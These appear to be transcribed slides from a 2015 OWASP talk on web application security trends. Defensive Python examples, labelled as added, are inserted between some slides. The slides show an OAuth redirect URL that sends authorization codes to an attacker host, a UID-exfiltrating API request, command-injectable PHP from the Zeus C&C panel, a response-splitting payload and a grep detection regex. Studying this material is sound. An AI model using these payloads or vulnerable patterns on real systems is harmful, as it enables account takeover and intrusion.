Web application security trends Omar Ganiev 28/02/2015


Page 1: Owasp web application security trends

Web application security trends

Omar Ganiev

28/02/2015

Page 2: Owasp web application security trends

Hi!

I’m Beched, and I love hacking and solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques connected with web application security.

Page 3: Owasp web application security trends

Classification

Questions to classify the vulnerabilities:

• Is the exploitation technique new or known?

• Is the attack target new or known technology?

• How large is a potential attack surface?

Page 4: Owasp web application security trends

Sources of news

• Bug trackers, mailing lists

• https://blackhat.com/html/archives.html

• https://blog.whitehatsec.com/top-10-web-hacking-techniques-2013/

• https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/

• …

Page 5: Owasp web application security trends

Community opinion

• 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)

Page 6: Owasp web application security trends

Obvious remarks

• Growth of security awareness of developers makes their code more secure

• At the same time new products and technologies are often released without careful security audit

• Old software is often considered safe and trustworthy, but contains severe vulnerabilities

• Business logic bugs are alive

Page 7: Owasp web application security trends

Obvious remarks

• Infosec is part of CS and IT, and it inherits global trends

• The global trend is a wide spread of various gadgets and mobile devices

• The global trend is making houses and vehicles smart

• The global trend is making web interfaces rich and self-contained in the browsers

Page 8: Owasp web application security trends

Take a look

• There’re loads of papers and presentations in the BlackHat archives. If we filter those which are connected with web security and rank the topics, we get the following scoreboard of trends:

• client-side && mobile

• clouds && big data && social networks

• misc && classic

• TLS && SSL

• IoT && routers

• PRNG && SSRF && etc

• old soft

Page 9: Owasp web application security trends

Client-side && Mobile

• Known technologies, new life

• There’re loads of papers on client-side security

• Loads of bug bounties are given for XSS or something like that

• There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters

• Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS

Page 10: Owasp web application security trends

Client-side && Mobile

DISSECTING CSRF ATTACKS & COUNTERMEASURES

JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME

MILLION BROWSER BOTNET

PIXEL PERFECT TIMING ATTACKS WITH HTML5

ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS

CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY

THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT

CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING

REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR

REVISITING XSS SANITIZATION

SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS

TWO FACTOR FAILURE

THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES

JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY

UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED

ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD

Page 11: Owasp web application security trends

Client-side && Mobile

• UXSS, MXSS

• ChromeOS, FirefoxOS

• Browser extensions hacking

• Endless security features vs bypass war

• XSS Auditor, CSP, HttpOnly, SOP, CORS

• Funny things like RFD (reflected file download)

• OAuth bugs

Page 12: Owasp web application security trends

Example

• Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified

• The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets

• There’re plenty of bypasses, take a look at:

http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/

http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/

https://www.blackhat.com/docs/us-14/materials/us-14-Johns-Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side-XSS-Filtering.pdf

Page 13: Owasp web application security trends

Example

• Other bypasses include CSRF token leakage, form target forgery, etc.

Page 14: Owasp web application security trends

Example

• Secure CMS and XSS Auditor can be spoiled with plugins

• Look at this typographic plugin for Drupal:

// .text() returns the element's decoded text, so escaped markup in the page comes back as raw <script>...
var result = Typographus_Lite_UTF8.typo_text( $(this).text() );
// after() parses its argument as HTML, so that decoded markup is inserted as live elements
$(this).after(result).remove();

• The jQuery method after() is insecure here, because it inserts its argument as HTML. As a result, the div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active

Page 15: Owasp web application security trends

Example

• OAuth is often vulnerable to open redirect due to lack of redirect_uri validation

https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&scope=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257

After authorization it redirects to:

http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85458d0db1c65792d52c8bef3c4407374b2

• Access token (code) value is enough for account takeover
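An added example, not from the slides: the two redirect_uri checks below, in Python, contrast the kind of substring validation that lets a URI such as http://*.ru.incsecurity.ru/ through with exact matching against the registered URI. The client id, the registered callback and the REGISTERED_REDIRECTS table are constructed for the demonstration; the function names are mine.

```python
from urllib.parse import urlsplit

# Constructed registration table for a hypothetical client: client_id -> exact redirect URIs.
REGISTERED_REDIRECTS = {
    "demo-client-id": {"https://example.ru/oauth/callback"},
}


def naive_redirect_ok(client_id, redirect_uri):
    """The kind of check behind the open redirect: is the registered host name present
    anywhere in the supplied redirect_uri? A host like example.ru.incsecurity.ru passes."""
    for allowed in REGISTERED_REDIRECTS.get(client_id, ()):
        if urlsplit(allowed).hostname in redirect_uri:
            return True
    return False


def strict_redirect_ok(client_id, redirect_uri):
    """Exact comparison of scheme, host, port, path and query against a registered URI,
    with no fragment allowed: a look-alike host, a userinfo trick or a changed path all fail."""
    try:
        supplied = urlsplit(redirect_uri)
        if supplied.fragment or supplied.scheme != "https":
            return False
        supplied_key = (supplied.scheme, supplied.hostname, supplied.port,
                        supplied.path, supplied.query)
    except ValueError:  # malformed authority or port
        return False
    for allowed in REGISTERED_REDIRECTS.get(client_id, ()):
        reg = urlsplit(allowed)
        if supplied_key == (reg.scheme, reg.hostname, reg.port, reg.path, reg.query):
            return True
    return False


if __name__ == "__main__":
    attacker_uri = "http://example.ru.incsecurity.ru/"
    print("naive :", naive_redirect_ok("demo-client-id", attacker_uri))   # True, code leaks
    print("strict:", strict_redirect_ok("demo-client-id", attacker_uri))  # False
```

The strict check deliberately compares the parsed components rather than the raw string, so case differences in the host do not cause false rejections while a changed scheme, path or authority still fails.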

Page 16: Owasp web application security trends

Clouds && Big data && Social networks

• Fairly new technologies

• Cloud computing and machine learning are heavily used for different purposes

• As for infosec, this can be used both for attack and defense

• Social networks and big data providers can be exploited for deanonymization and fraud

• Machine learning can be used for building WAF

Page 17: Owasp web application security trends

Clouds && Big data && Social networks

PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER

USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER

WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS

BIG DATA FOR WEB APPLICATION SECURITY

FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC

PIVOTING IN AMAZON CLOUDS

BRINGING A MACHETE TO THE AMAZON

BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE

SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING

BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS

HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT

HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS

Page 18: Owasp web application security trends

Example

• Post-exploitation of distributed web applications is often a bit tricky – you don’t know exactly which node will process your request

• Nodes can often be enumerated via HTTP response headers or cookies

• Sometimes some nodes are not updated and contain vulnerabilities

• This creates mind-blowing phantom vulnerabilities =)

• Take a look at a cool talk about Amazon EC2 post-exploitation: https://www.blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf

Page 19: Owasp web application security trends

Example

• Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is a documented API request:

https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=http://incsecurity.ru/?adv_id=$UID

• $UID will be replaced with the actual cookie value by the server and will be sent to the attacker’s host

• Information about the user can be obtained via JSONP hijacking, even if the session id is checked.

Page 20: Owasp web application security trends

Example

• Request:

https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st=1

• Response contains information about gender, interests, etc. Part of the interests description file:

…
{"id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": ""}
…

Page 21: Owasp web application security trends

Misc & Classic

• There’re a lot of works which continue previous research and bug reports

• They improve exploitation of classical vulnerabilities like SQL injection, and testing/analysis methods

• The rise of the penetration testing industry pushed up demand for .NET and J2EE application hacking methods

Page 22: Owasp web application security trends

Misc & Classic

') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00

INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA

CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS

FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS

I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS

WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS!

SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS

Page 23: Owasp web application security trends

Example

• The paper about hacking C&C panels reminded me of the RCE vulnerability in the Zeus C&C, which I published around 2010. I opened these links now:

http://ahack.ru/bugs/zeus-vulnerability-exploit.htm

https://github.com/Visgean/Zeus/

• Guess what I have been seeing there for 5 years? ;)

Page 24: Owasp web application security trends

Example

• The name of the function has changed, but the vulnerability is still there, AFAICS...

...
function fsarcCreate($archive, $files)
...
// $archive and every entry of $files are concatenated straight into the shell command line
$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
exec($cli, $e, $r);
...
// the file list comes from the request body without any filtering
foreach($_POST['files'] as $file)
    $list[] = $_CUR_PATH.'/'.$file;
...
if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)
    die('Failed to create archive, please check "system/fsarc.php" script.');
...

Page 25: Owasp web application security trends

Example

• This is a small example; probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code?

• The paper on contemporary automatic program analysis mostly tells about grep =)

• Personally I use grep with lovely regular expressions:

\w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"|)[@\s\.]*(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*
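The pattern above can be run outside grep as well. The following Python script is added here as an illustration and is not part of the slides: it compiles the slide's regular expression unchanged and applies it line by line to a constructed PHP fragment, so you can see which include/require statements the heuristic flags (a variable reaching the path without one of the listed "safe" functions around it) and which it skips. The PHP sample and the find_dynamic_includes helper are mine; the pattern is the author's.

```python
import re

# The author's grep pattern from the slide, used unchanged (Python's re accepts this PCRE syntax).
INCLUDE_RE = re.compile(
    r"""\w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"|)[@\s\.]*"""
    r"""(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen"""
    r"""|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32"""
    r"""|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*"""
)

# Constructed PHP fragment (not real project code) mixing static, sanitised and raw includes.
PHP_SAMPLE = """<?php
include 'config.php';
include $_GET['page'];
require_once dirname(__FILE__) . '/lib/' . $module . '.php';
include 'pages/' . basename($_GET['page']) . '.php';
include_once("templates/" . intval($id) . ".php");
require("$path/init.php");
"""


def find_dynamic_includes(php_source):
    """Return (line number, stripped line) for every line the pattern matches.
    grep works line by line, so a multi-line include statement would be missed; that
    limitation is inherited here on purpose to mirror the slide's workflow."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if INCLUDE_RE.search(line):
            hits.append((lineno, line.strip()))
    return hits


if __name__ == "__main__":
    for lineno, line in find_dynamic_includes(PHP_SAMPLE):
        print(f"{lineno}: {line}")
```

Lines 3, 4 and 7 of the sample are reported: a request parameter used directly, a path built from a variable with dirname() (which is not in the pattern's whitelist), and a variable interpolated inside a quoted string. The basename() and intval() lines are skipped because the negative lookahead treats those calls as sanitisation; that is a heuristic, not proof of safety, so flagged lines still need manual review.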

Page 26: Owasp web application security trends

Example

Page 27: Owasp web application security trends

Example

• 2014 has gone, and here comes 2015, but PHP and Apache are still broken

• Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there

• Apache has not yet learnt RFC

• Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP

Page 28: Owasp web application security trends

TLS && SSL

• As old as the world

• There’re still a lot of misconfiguration issues with HTTPS

• Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others

• Many configuration mistakes are the result of a trade-off between performance and security

Page 29: Owasp web application security trends

TLS && SSL

SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME

TLS 'SECRETS'

TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS

A PERFECT CRIME? ONLY TIME WILL TELL

THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP

BYPASSING HTTP STRICT TRANSPORT SECURITY

Page 30: Owasp web application security trends

IoT && Routers

• This is one of the most popular new IT trends everyone has heard about

• New means untested. Untested means vulnerable

• Seriously, the Internet of things is broken, and many yell about it

• People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc

Page 31: Owasp web application security trends

IoT && Routers

EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER

HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE

A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES

ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS

OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS

Page 32: Owasp web application security trends

Example

• Just look at this:

Page 33: Owasp web application security trends

Example

• And this:

Page 34: Owasp web application security trends

Example

• And this (admin;admin):

Page 35: Owasp web application security trends

Example

• BTW, side note: why doesn’t XSS Auditor perform an HTTP response splitting check?

• As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject the header X-XSS-Protection: 0.
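Added example (not from the slides, and not the vulnerable product from the screenshot): a header serializer that refuses CR, LF and NUL in values, next to the naive join that lets a response-splitting payload in a user-controlled Location value become a separate X-XSS-Protection: 0 header. The USER_LANG value and the function names are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# RFC 7230 "token" characters, the only ones allowed in a header name
TOKEN_RE = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def naive_serialize_headers(headers):
    """Joins name/value pairs without inspecting the values: any CR/LF inside a value
    becomes a line break in the header block, which is exactly response splitting."""
    return "\r\n".join(f"{name}: {value}" for name, value in headers) + "\r\n\r\n"


def serialize_headers(headers):
    """Same job, but refuses names that are not tokens and values containing CR, LF or NUL,
    so user input can never terminate a header or start a new one."""
    lines = []
    for name, value in headers:
        if not TOKEN_RE.fullmatch(name):
            raise ValueError(f"invalid header name: {name!r}")
        if any(ch in value for ch in "\r\n\x00"):
            raise ValueError(f"CR/LF/NUL in value of {name}: {value!r}")
        lines.append(f"{name}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_header_block(block):
    """Reads a header block the way a browser would: one header per CRLF-separated line."""
    headers = {}
    for line in block.rstrip("\r\n").split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


# Constructed request parameter carrying an encoded CRLF followed by an extra header.
USER_LANG = unquote("en%0d%0aX-XSS-Protection:%200")


if __name__ == "__main__":
    raw = naive_serialize_headers([("Location", "/home?lang=" + USER_LANG)])
    print(parse_header_block(raw))  # the injected X-XSS-Protection header is now a real one
    try:
        serialize_headers([("Location", "/home?lang=" + USER_LANG)])
    except ValueError as err:
        print("rejected:", err)
```

Most modern frameworks and servers already apply the strict behaviour; the check matters when headers are assembled by hand or passed through an older component.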

Page 36: Owasp web application security trends

PRNG && SSRF && etc

• XXE, SSRF and randomness hacking were hot topics of 2012-2013

• They are popular today too, new applications and attack vectors are developed

Page 37: Owasp web application security trends

PRNG && SSRF && etc

BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS

XML OUT-OF-BAND DATA RETRIEVAL

THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS

ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP

Page 38: Owasp web application security trends

Example

• Autodiscover interface in OWA reveals an internal IP address of the mail server

• Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”):

Microsoft.Exchange.Data.Directory.SuitabilityVerifier.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential)

• If there were a bypass for the anti-CSRF canary, you could possibly steal NTLM credentials

Page 39: Owasp web application security trends

Example

• vBulletin forum CMS allows uploading attachments from a remote URL (class_upload.php, class_vurl.php)

• First it checks the file size via a HEAD request, then it downloads the file

• You can use an HTTP multiplexor to exploit the race condition: return code 200 and a valid file size for the first request and a 302 redirect for the second request

• Some configuration options and old versions of cURL allow the file:// URL wrapper in the Location header
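Added example (not vBulletin's code and not from the slides): the checks a remote-URL uploader needs so that the HEAD-then-GET sequence above cannot be played against it. Every redirect target is resolved and re-validated as http(s) before it is followed, and the size limit is enforced on the bytes actually received instead of on a separate HEAD response. The function names, the do_get transport callback and the sample URLs are constructed; fake_transport stands in for a real HTTP client so the policy runs offline.

```python
from urllib.parse import urlsplit, urljoin

MAX_REDIRECTS = 3  # hypothetical limit; stop after a few hops


def check_url(url):
    """Accept only absolute http(s) URLs with a host name. Applied to the user-supplied URL and
    to every redirect target, so a Location of file:///... is refused before any client sees it."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"refusing non-http(s) or host-less URL: {url!r}")
    return url


def resolve_redirect(current_url, location):
    """Resolve a Location header (absolute or relative) against the URL that produced it,
    then re-validate the result with the same rule as the original URL."""
    return check_url(urljoin(current_url, location))


def read_limited(chunks, max_bytes):
    """Enforce the size limit on the body that is actually received. A Content-Length from a
    separate HEAD request describes a different response and may be stale or forged."""
    buf = bytearray()
    for chunk in chunks:
        buf.extend(chunk)
        if len(buf) > max_bytes:
            raise ValueError(f"body exceeded {max_bytes} bytes")
    return bytes(buf)


def fetch_attachment(start_url, do_get, max_bytes):
    """Single GET with manual redirect handling. do_get(url) is a hypothetical transport
    callback returning (status, headers, body_chunks) and must not follow redirects itself,
    otherwise the per-hop validation is skipped."""
    url = check_url(start_url)
    for _ in range(MAX_REDIRECTS + 1):
        status, headers, chunks = do_get(url)
        if status in (301, 302, 303, 307, 308):
            url = resolve_redirect(url, headers["Location"])
            continue
        if status != 200:
            raise ValueError(f"unexpected status {status} for {url!r}")
        return read_limited(chunks, max_bytes)
    raise ValueError("too many redirects")


def fake_transport(url):
    """Constructed stand-in for an HTTP client: one redirect to a file:// URL, one legitimate
    relative redirect, and a 2000-byte body."""
    if url == "http://cdn.example/a.png":
        return 302, {"Location": "file:///etc/passwd"}, []
    if url == "http://cdn.example/b.png":
        return 302, {"Location": "/c.png"}, []
    if url == "http://cdn.example/c.png":
        return 200, {}, [b"x" * 1000, b"y" * 1000]
    return 404, {}, []


if __name__ == "__main__":
    print(len(fetch_attachment("http://cdn.example/b.png", fake_transport, 4000)))  # 2000
    for bad in ("http://cdn.example/a.png", "ftp://cdn.example/b.png"):
        try:
            fetch_attachment(bad, fake_transport, 4000)
        except ValueError as err:
            print("rejected:", err)
```

The design choice is to drop the preliminary HEAD altogether: it cannot be reconciled with the GET that follows, so the only size that can be trusted is the one counted while streaming the real body.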

Page 40: Owasp web application security trends

Old soft

• We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014

• HeartBleed, GHOST, ShellShock, POODLE, gotofail, etc

• Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere

Page 41: Owasp web application security trends

Old soft

EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD

SSL VALIDATION CHECKING VS. GO(ING) TO FAIL

Page 42: Owasp web application security trends

Example

• Although these famous vulnerabilities are not caused by web applications, they deeply affect them

• ShellShock and GHOST affect the webapp<->OS interaction layer

• HeartBleed, goto fail and POODLE mainly affect the webapp<->encryption<->network interaction layer

Page 43: Owasp web application security trends

Example

• This is another proof of why we shouldn’t consider any part of the software as trusted. Each component of the system can be broken

• BTW, newspapermen also started the era of nicknames for vulnerabilities

• I find this a bit ridiculous but funny =)

Page 44: Owasp web application security trends

Summary

• The Internet is broken

• The WWW is broken

• Hackers gonna hack

• Web applications become smarter

• Hacking becomes smarter